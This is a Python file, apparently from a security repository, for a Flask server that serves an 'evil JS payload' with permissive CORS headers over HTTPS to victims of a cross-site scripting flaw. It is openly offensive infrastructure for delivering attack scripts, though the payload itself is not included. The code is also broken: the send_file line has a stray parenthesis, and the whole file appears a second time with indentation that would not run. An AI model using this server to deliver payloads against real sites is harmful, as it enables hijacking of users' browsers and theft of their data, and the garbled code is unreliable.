queencitycyber/xsscors.py

## xsscors.py
"""
A tiny Flask web server ready to shoot reflective CORS Access-Control-Allow-Origin headers to accept connections from an XSS affected victim while hosting your evil JS payload
"""
# Stolen from https://twitter.com/snovvcrash/status/1511702029403631620

from flask import Flask, send_file
from flask_cors import CORS

app = Flask(__name__)
CORS(app)

@app.route('/xss.js', methods=['GET'])
def xss():
  return send_file('./xss.js'), download_name='xss.js')

# openssl req -x509 -newkey rsa:4096 -nodes -out cert.pem -keyout key.pem -days 365
app.run(host='0.0.0.0', port=443, ssl_context=('cert.pem', 'key.pem'))
	"""
	A tiny Flask web server ready to shoot reflective CORS Access-Control-Allow-Origin headers to accept connections from an XSS affected victim while hosting your evil JS payload
	"""
	# Stolen from https://twitter.com/snovvcrash/status/1511702029403631620

	from flask import Flask, send_file
	from flask_cors import CORS

	app = Flask(__name__)
	CORS(app)

	@app.route('/xss.js', methods=['GET'])
	def xss():
	return send_file('./xss.js'), download_name='xss.js')

	# openssl req -x509 -newkey rsa:4096 -nodes -out cert.pem -keyout key.pem -days 365
	app.run(host='0.0.0.0', port=443, ssl_context=('cert.pem', 'key.pem'))